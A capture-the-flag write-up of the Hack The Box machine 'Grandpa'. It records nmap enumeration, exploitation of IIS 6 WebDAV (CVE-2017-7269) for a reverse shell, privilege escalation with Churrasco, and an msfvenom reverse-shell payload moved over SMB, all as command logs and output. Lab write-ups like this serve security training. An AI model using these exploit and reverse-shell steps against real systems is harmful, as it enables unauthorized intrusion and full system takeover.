Hack The Box - Granpa
Introduction
Grandpa is an easy-rated machine on hack the box. It has only a rating of 3.6, which is decent but not high. So either this is a very easy exploit or there’s something to brute force. Without talking too much I will just start with the enumeration.
Enumeration
As always I use Nmap to scan the box.
Nmap Scan
The first thing I always do is a Nmap scan of all ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ sudo nmap -sS -vv -p- 10.10.10.14
[sudo] password for user:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 20:08 CEST
Initiating Ping Scan at 20:08
Scanning 10.10.10.14 [4 ports]
Completed Ping Scan at 20:08, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:08
Completed Parallel DNS resolution of 1 host. at 20:08, 0.00s elapsed
Initiating SYN Stealth Scan at 20:08
Scanning 10.10.10.14 [65535 ports]
Discovered open port 80/tcp on 10.10.10.14
SYN Stealth Scan Timing: About 18.82% done; ETC: 20:11 (0:02:14 remaining)
SYN Stealth Scan Timing: About 46.81% done; ETC: 20:11 (0:01:09 remaining)
Completed SYN Stealth Scan at 20:10, 105.91s elapsed (65535 total ports)
Nmap scan report for 10.10.10.14
Host is up, received echo-reply ttl 127 (0.026s latency).
Scanned at 2021-08-29 20:08:59 CEST for 106s
Not shown: 65534 filtered ports
Reason: 65534 no-responses
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 106.12 seconds
Raw packets sent: 131154 (5.771MB) | Rcvd: 96 (4.780KB)
There is only one open port, I will make a -A scan of this port:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ sudo nmap -A -p 80 10.10.10.14
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-29 20:12 CEST
Nmap scan report for 10.10.10.14
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE
| MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| WebDAV type: Unknown
| Server Date: Sun, 29 Aug 2021 18:20:40 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL,
| PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Device type: general purpose|media device
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (93%)
Aggressive OS guesses: Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (93%),
Microsoft Windows Server 2003 SP1 (93%), Microsoft Windows Server 2003 SP1 or SP2 (93%),
Microsoft Windows Server 2003 SP2 (93%), Microsoft Windows 2003 SP2 (91%),
Microsoft Windows 2000 SP3/SP4 or Windows XP SP1/SP2 (90%),
Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP3 (90%),
Microsoft Windows 2000 SP1 (90%), Microsoft Windows 2000 SP4 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 41.74 ms 10.10.16.1
2 62.40 ms 10.10.10.14
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
Web Server Enumeration
The only open port is 80, on which IIS 6 runs. Since I have not much information, I search for an exploit. There is the WebDAV remote code execution vulnerability (CVE-2017-7269). I found an exploit on GitHub:
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
Exploitation
I use the exploit found above. I download and execute it (with python):
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ python exploit.py grandpa.htb 80 10.10.17.28 4444
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
---snip---
After waiting a bit, a reverse shell spawns in my Netcat listener:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.17.28] from (UNKNOWN) [10.10.10.14] 1032
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
c:\windows\system32\inetsrv>c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
I cannot read the user flag (harry) so I need to escalate my privileges.
Privilege Escalation
I used the windows exploit suggester:
Date: 20140812
CVE: CVE-2014-1819
KB: KB2993651
Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 x64 Edition Service Pack 2
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a
Date: 20140812
CVE: CVE-2014-1819
KB: KB2993651
Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation of Privilege
Affected product: Microsoft Windows Server 2003 for Itanium-based Systems Service Pack 2
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: n/a
I could not find an exploit for these CVEs. So I remembered that in the box granny I used a tool called churrasco (which is like an automated juicy potato). So I check if this works here as well:
C:\Documents and Settings>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAuditPrivilege Generate security audits Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
The system seems vulnerable (SeImpersonatePrivilege), so I start an SMB server to transfer the file:
┌──(user㉿KaliVM)-[/tools/Churrasco]
└─$ ll
total 352
-rw-r--r-- 1 user user 10364 Aug 17 09:09 Churrasco.cpp
-rw-r--r-- 1 user user 31232 Aug 17 09:09 churrasco.exe
-rw-r--r-- 1 user user 52224 Aug 17 09:09 Churrasco.ncb
-rw-r--r-- 1 user user 907 Aug 17 09:09 Churrasco.sln
-rw-r--r-- 1 user user 9216 Aug 17 09:09 Churrasco.suo
-rw-r--r-- 1 user user 3921 Aug 17 09:09 Churrasco.vcproj
-rw-r--r-- 1 user user 16744 Aug 17 09:09 Churrasco.zip
-rw-r--r-- 1 user user 43 Aug 17 09:09 README.md
-rw-r--r-- 1 user user 1316 Aug 17 09:09 ReadMe.txt
-rw-r--r-- 1 user user 296 Aug 17 09:09 stdafx.cpp
-rw-r--r-- 1 user user 501 Aug 17 09:09 stdafx.h
┌──(user㉿KaliVM)-[/tools/Churrasco]
└─$ sudo impacket-smbserver kali .
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Now, I can transfer the file to the target machine:
C:\temp>copy \\10.10.17.28\kali\churrasco.exe
copy \\10.10.17.28\kali\churrasco.exe
1 file(s) copied.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\temp
08/29/2021 09:49 PM <DIR> .
08/29/2021 09:49 PM <DIR> ..
08/17/2021 10:09 AM 31,232 churrasco.exe
1 File(s) 31,232 bytes
2 Dir(s) 18,091,016,192 bytes free
You just need to execute the exe. To execute commands, I use the -d flag (to start cmd.exe):
C:\temp>churrasco.exe -d "cmd.exe"
churrasco.exe -d "cmd.exe"
nt authority\system
C:\WINDOWS\TEMP>whoami
whoami
nt authority\system
C:\temp>whoami
whoami
C:\ADFS>ipconfig
ipconfig
nt authority\network service
The shell seems pretty buggy, so I create an msfvenom payload to get another reverse shell:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.17.28 lport=5555 -f exe -o sh.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
Transfer the payload and run churrasco again:
C:\temp>copy \\10.10.17.28\kali\sh.exe
copy \\10.10.17.28\kali\sh.exe
nt authority\system
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\temp
08/29/2021 09:57 PM <DIR> .
08/29/2021 09:57 PM <DIR> ..
08/17/2021 10:09 AM 31,232 churrasco.exe
08/29/2021 09:48 PM 73,802 sh.exe
2 File(s) 105,034 bytes
2 Dir(s) 18,090,938,368 bytes free
C:\temp>churrasco.exe -d "sh.exe"
churrasco.exe -d "sh.exe"
1 file(s) copied.
The output still seems buggy, but nevertheless I got the shell:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/grandpa]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.17.28] from (UNKNOWN) [10.10.10.14] 1037
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\temp>whoami
whoami
nt authority\system
Time to get both flags.
Flags
I never got privileges as user Harry, so with this high privileged shell I can get both flags:
C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
bd**************************d869
C:\Documents and Settings\Harry\Desktop>type ..\..\Administrator\Desktop\root.txt
type ..\..\Administrator\Desktop\root.txt
93**************************bb7b
Conclusions
This box was very easy because it was basically the same as granny.